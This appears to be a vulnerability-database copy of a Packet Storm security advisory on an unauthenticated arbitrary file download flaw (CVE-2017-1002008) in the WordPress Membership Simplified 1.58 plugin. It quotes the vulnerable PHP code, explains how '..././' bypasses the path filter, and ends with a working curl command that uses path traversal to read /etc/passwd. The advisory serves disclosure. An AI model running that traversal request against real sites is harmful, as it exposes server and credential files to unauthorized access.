Lucene search
Larry W. CashdollarPACKETSTORM:141662HistoryMar 16, 2017 - 12:00 a.m.
WordPress Membership Simplified 1.58 Arbitrary File Download
2017-03-1600:00:00
Larry W. Cashdollar
packetstormsecurity.com
31
0.039 Low
EPSS
Percentile
92.0%
`Title: Arbitrary file download vulnerability in Wordpress Plugin Membership Simplified v1.58
Author: Larry W. Cashdollar, @_larry0
Date: 2017-03-13
CVE-ID:[CVE-2017-1002008]
Download Site: https://wordpress.org/plugins/membership-simplified-for-oap-members-only
Vendor: https://profiles.wordpress.org/williamdeangelis/
Vendor Notified: 2017-03-13
Vendor Contact: [email protected]
Advisory: http://www.vapidlabs.com/advisory.php?v=187
Description: Membership Simplified allows you to generate membership lessons with templated content to create a unified look and feel throughout your courses.
Vulnerability:
The file download code located membership-simplified-for-oap-members-only/download.php does not check whether a user is logged in and has download privledges, the code on line 5 that checks the path can be defeated by using a ..././ pattern to get the desired ../ after being passed through the str_replace() function:
3 $path = substr(getcwd(), 0, -50). "uploads/membership-simplified-for-oap-members-only/"; // change the path to fit your websites document structure
4 $fullPath = $path.$_GET['download_file'];
5 $fullPath = str_replace("../","",$fullPath);
6
7 if ($fd = fopen($fullPath, "r")) {
8 $fsize = filesize($fullPath);
9 $path_parts = pathinfo($fullPath);
10 $ext = strtolower($path_parts["extension"]);
11 switch ($ext) {
12 case "pdf":
13 header("Content-type: application/pdf"); // add here more headers for d iff. extensions
14 header("Content-Disposition: attachment; filename=\"".$path_parts["base name"]."\""); // use 'attachment' to force a download
15 break;
16 default;
17 header("Content-type: application/octet-stream");
18 header("Content-Disposition: filename=\"".$path_parts["basename"]."\"") ;
19 }
20 header("Content-length: $fsize");
21 header("Cache-control: private"); //use this to open files directly
22 while(!feof($fd)) {
23 $buffer = fread($fd, 2048);
24 echo $buffer;
Export: JSON TEXT XML
Exploit Code:
aC/ $ curl http://example.com/wordpress/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=..././..././..././..././..././..././..././..././etc/passwd
aC/
`
Related
packetstorm
packetstorm
WordPress Membership Simplified 1.58 Arbitrary File Download
2017-03-17 00:00:00
cve
cve
CVE-2017-1002008
2017-09-14 13:29:00
wpvulndb
wpvulndb
Membership Simplified <= 1.58 - Unauthenticated Arbitrary File Download
2017-03-14 00:00:00
nvd
nvd
CVE-2017-1002008
2017-09-14 13:29:00
prion
prion
Design/Logic Flaw
2017-09-14 13:29:00
seebug
seebug
Wordpress Plugin Membership Simplified 1.58 - arbitrary File Download
2017-03-20 00:00:00
cvelist
cvelist
CVE-2017-1002008
2017-09-14 13:00:00
exploitpack
exploitpack
Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download
2017-03-16 00:00:00
exploitdb
exploitdb
WordPress Plugin Membership Simplified 1.58 - Arbitrary File Download
2017-03-16 00:00:00
akamaiblog
akamaiblog
Larry's Cabinet of Web Vulnerability Curiosities
2017-08-02 11:30:00
openvas
openvas